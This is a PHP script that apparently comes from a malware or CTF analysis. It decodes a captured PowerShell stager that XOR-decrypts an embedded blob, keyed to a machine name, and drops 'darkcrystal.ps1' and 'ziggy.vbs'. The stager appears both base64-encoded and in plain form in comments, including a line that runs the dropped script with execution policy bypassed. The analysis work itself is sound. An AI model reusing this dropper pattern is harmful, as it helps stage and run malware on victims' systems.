<?php
//$cmd = "JAB0AGgAZQA9AEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAQQBWAEkARABCAH4AMQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAcgBpAHMAZQAuAHQAeAB0ADsAaQBmACgAJABFAG4AdgA6AEMATwBNAFAAVQBUAEUAUgBOAEEATQBFACAALQBtAGEAdABjAGgAIAAiAEIATwBXAEkARQBQAEMAIgApAHsAJABhAG4AZAA9ACIAUwBQAEkARABFAFIAUwBGAFIATwBNAE0AQQBSAFMAIgB9ADsAJABmAGEAbABsAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGgAZQApACkAKQA7ACQAZwBvAGIAbABpAG4AawBpAG4AZwA9ACIAIgA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAtAGwAdAAkAGYAYQBsAGwALgBsAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAZwBvAGIAbABpAG4AawBpAG4AZwArAD0AWwBjAGgAYQByAF0AKABbAEkAbgB0AF0AJABmAGEAbABsAFsAJABpAF0ALQBiAHgAbwByAFsASQBuAHQAXQAkAGEAbgBkAFsAJABpACUAKAAkAGEAbgBkAC4AbABlAG4AZwB0AGgAKQBdACkAfQA7ACQAZwBvAGIAbABpAG4AawBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAMAAsADUAMAAyADMAMwApAD4APgBDADoAXABVAHMAZQByAHMAXABEAEEAVgBJAEQAQgB+ADEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGQAYQByAGsAYwByAHkAcwB0AGEAbAAuAHAAcwAxADsAJABnAG8AYgBsAGkAbgBrAGkAbgBnAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA1ADAAMgAzADMAKQA+AD4AQwA6AFwAVQBzAGUAcgBzAFwARABBAFYASQBEAEIAfgAxAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAB6AGkAZwBnAHkALgB2AGIAcwA7ACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AYwAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAQQBWAEkARABCAH4AMQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAZABhAHIAawBjAHIAeQBzAHQAYQBsAC4AcABzADEA";

//echo base64_decode($cmd)."\n";
/*
$the=Get-ContentC:\Users\DAVIDB~1\AppData\Local\Temp\rise.txt;
if($Env:COMPUTERNAME-match"BOWIEPC"){$and="SPIDERSFROMMARS"};
$fall=([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($the)));
$goblinking="";
for($i=0;$i-lt$fall.length;$i++){$goblinking+=[char]([Int]$fall[$i]-bxor[Int]$and[$i%($and.length)])};
$goblinking.Substring(0,50233)>>C:\Users\DAVIDB~1\AppData\Local\Temp\darkcrystal.ps1;
$goblinking.Substring(50233)>>C:\Users\DAVIDB~1\AppData\Local\Temp\ziggy.vbs;
&powershell-epbypass-cC:\Users\DAVIDB~1\AppData\Local\Temp\darkcrystal.ps1
*/

// Base64-decode rise.txt then xor-decrypt it with the key "SPIDERSFROMMARS";
$rise = file_get_contents('rise'); // already base64-decoded
$key = "SPIDERSFROMMARS";
$out = "";
for($i=0; $i<strlen($rise); $i++){
	$cur = ord($rise[$i]);
	$k = ord($key[($i % strlen($key))]);
	$out .= chr($cur ^ $k);
}

// Split the result into 2 files
$darkcrystal = substr($out,0,50233);
$ziggy = substr($out,50233);

file_put_contents("darkcrystal.ps1",$darkcrystal);
file_put_contents("ziggy.vbs", $ziggy);
?>